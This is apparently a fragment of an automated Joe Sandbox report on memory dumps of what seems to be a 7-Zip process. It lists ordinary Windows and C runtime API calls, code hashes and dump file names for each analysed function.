                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1534225298-0
                                                                                                                                                                                                                                          • Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                                                          • Instruction ID: 4ac95315b561669dc3909ad40fd1236ef63c7c34904592b7a2ac748f64bbc313
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A518E73704A8097CA35DB16E4C029DB360F789BD4F408226EB9E4BB59DF38D5A5CB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                                                          • Instruction ID: a25fbd1bb071c9a4631a2b5fcc44b8261fad9b172f08a6db4a8d932028bafa39
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF31E323714684CACB26EF11E4C055EA7A5F7887A0F599236EF8E4B758DF78C882C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                          • Instruction ID: ded233023e61ce2a2a968d93e3e1d6dd3d6afd6d9c498ea495228256d09f2015
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA119C2220894051DA11EB65E5912EB9760EBD53F0F441371BBEE8BAF9DF58C98BCB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3934437811-0
                                                                                                                                                                                                                                          • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                          • Instruction ID: 4aba9e2fc131aa9c03d4de1df0f3513930618c8691d089de92faf786f1a5f5c4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA1184537046809BCA36DF35E89439EB750E7467A4F484325EFAD0B7A9DF68C54AC700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                          • Instruction ID: 21cbac0b5380b4884083f9cc5dbb5cbbde1dea65fb7f0fe803bf1f1379ab3e1c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5401DB2220454490CD2AFB22F4551EF9721EBCA7E4F445321BE9E5B7A5CF28C5CAC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 003189D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 003189EA
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE ref: 00318D51
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 00318DA4
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00318DB2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile$CloseHandlefree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 210839660-0
                                                                                                                                                                                                                                          • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                          • Instruction ID: fc6b649962372f34d64a59b76c44cfc89a274df8619e6894118b99d1999e27fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21218033104A819AC7659F15B84169A6724F39A7F4F540321EFB947BE4CF38C9E6CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00313274: memmove.MSVCRT ref: 003132AC
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00352D41
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00352DCF
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00352DFF
                                                                                                                                                                                                                                            • Part of subcall function 00312300: fputc.MSVCRT ref: 00312311
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$fputcfreememmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1158454270-0
                                                                                                                                                                                                                                          • Opcode ID: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                                                                                          • Instruction ID: 34fe036cf499ec489fe88183e507bc207ffa0744ff25a1e72070c7085109fffc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F215855204A0181CF26EF25E85139F6370EB9DBE5F489221ED6F4B768DE3CC595C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3796167841-0
                                                                                                                                                                                                                                          • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                          • Instruction ID: 93905f18525e7c37de8d6eabe5cf3b238c782acdfb4762ea8c47b1af1a175f1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8951B162360B55A7DB2E8E2AD5407E923A0FB0D794F151126DF0A8BF50DB39E8E6C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputc
                                                                                                                                                                                                                                          • String ID: Kernel
                                                                                                                                                                                                                                          • API String ID: 1992160199-1736990243
                                                                                                                                                                                                                                          • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                                                          • Instruction ID: 1ea79e35156c1a1df38128416e7edc7fb4c848c66040116149f957148de9ab4b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BC09B55751A0882FF1517B7EC453251215D75DF91F185030CE1D07350D91CD5D68711
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00343E2A
                                                                                                                                                                                                                                            • Part of subcall function 00312130: malloc.MSVCRT ref: 00312134
                                                                                                                                                                                                                                            • Part of subcall function 00312130: _CxxThrowException.MSVCRT ref: 0031214F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorExceptionLastThrowmalloc
                                                                                                                                                                                                                                          • String ID: h3
                                                                                                                                                                                                                                          • API String ID: 2114622545-3589807947
                                                                                                                                                                                                                                          • Opcode ID: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                                                          • Instruction ID: ae75fa9ceaf40562935b273fc86eed036da612069d12167d4d0851e0f0425155
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA31AE33602B4086DB1A9F29D5943AAB3E5FB89FE0F1945349F5A0B764DF38D996C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0035B20D
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 0035B232
                                                                                                                                                                                                                                            • Part of subcall function 00312B04: _CxxThrowException.MSVCRT ref: 00312B2D
                                                                                                                                                                                                                                            • Part of subcall function 00312B04: free.MSVCRT ref: 00312B44
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrowfputsfreememset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3104931167-0
                                                                                                                                                                                                                                          • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                                                          • Instruction ID: de2872a75fc3e86dc26a2a0db5367f21202faaefb76fb6384f85b1646671708d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2001C0777006909AE70ADF6BEA80B5E6720F759B95F098422DF0807721DF74D8AAC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,00000003,?,00318E1D), ref: 00318A99
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000003,?,00318E1D), ref: 00318AA6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                                                          • Instruction ID: 73f237794df03ae3d42e8d82f968282160cb67de4d339abb0bb7cbf4f0100828
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf0d94ecf42caac14694387020930a2bb5976bb2b97546524ee3b67299013e46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9F0FC62B117C087DF2A8B6DD8847992765EF5E799F6C4422CA0943B60DF29C8C2C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputcfputsfree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2822829076-0
                                                                                                                                                                                                                                          • Opcode ID: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                                                                                                                          • Instruction ID: 94c9076db9f546aec324ea751a48e9c1b40752a2a5f60022476b3105e8114cfd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0bb0529e73891d184958c91263af9b458e0cdb2801925c14b56b99b46a72feb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0126720494480CA26DF25E95575E9330E789BF9F488321EE6D4B7F9DF28C5DAC700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memmove.MSVCRT ref: 0034404D
                                                                                                                                                                                                                                          • memmove.MSVCRT ref: 00344087
                                                                                                                                                                                                                                            • Part of subcall function 00313404: free.MSVCRT ref: 00313431
                                                                                                                                                                                                                                            • Part of subcall function 00313404: memmove.MSVCRT ref: 0031344C
                                                                                                                                                                                                                                            • Part of subcall function 00312130: malloc.MSVCRT ref: 00312134
                                                                                                                                                                                                                                            • Part of subcall function 00312130: _CxxThrowException.MSVCRT ref: 0031214F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1415420288-0
                                                                                                                                                                                                                                          • Opcode ID: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                                                          • Instruction ID: a3e9100e3ec467c69ba583297fc99dc5d2db12bb350812ea4ec4aa0591d2330b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e93dba3152148191410d57b00f48a4d72ec7dee8ca6e7e419d011094a693373
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D431B3773196C196CA36EF15E1942EEB760F795340F404422CB9D4BB69EF38E699CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memmove.MSVCRT ref: 00344065
                                                                                                                                                                                                                                          • memmove.MSVCRT ref: 00344087
                                                                                                                                                                                                                                            • Part of subcall function 00313404: free.MSVCRT ref: 00313431
                                                                                                                                                                                                                                            • Part of subcall function 00313404: memmove.MSVCRT ref: 0031344C
                                                                                                                                                                                                                                            • Part of subcall function 00312130: malloc.MSVCRT ref: 00312134
                                                                                                                                                                                                                                            • Part of subcall function 00312130: _CxxThrowException.MSVCRT ref: 0031214F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1415420288-0
                                                                                                                                                                                                                                          • Opcode ID: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                                                          • Instruction ID: f44e9390eeb95e63d7f7dacfb4f714bc55bf7df578bfacd34bdaea8dc9c67cb7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A1190622156C592CA32EB55E0D53EEA350E795790F804436CB9D4FA65DF38D6CACB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                          • Instruction ID: 584e1933aa02ed4841e13bb5c78181b9d15b9322500109980de0e8f19c2a0c1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF08623302B94C6DA15AA26E88025D6714AB46FB1F198331DF7917791CF64C457C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00312130: malloc.MSVCRT ref: 00312134
                                                                                                                                                                                                                                            • Part of subcall function 00312130: _CxxThrowException.MSVCRT ref: 0031214F
                                                                                                                                                                                                                                          • memmove.MSVCRT ref: 0035C815
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0035C81D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
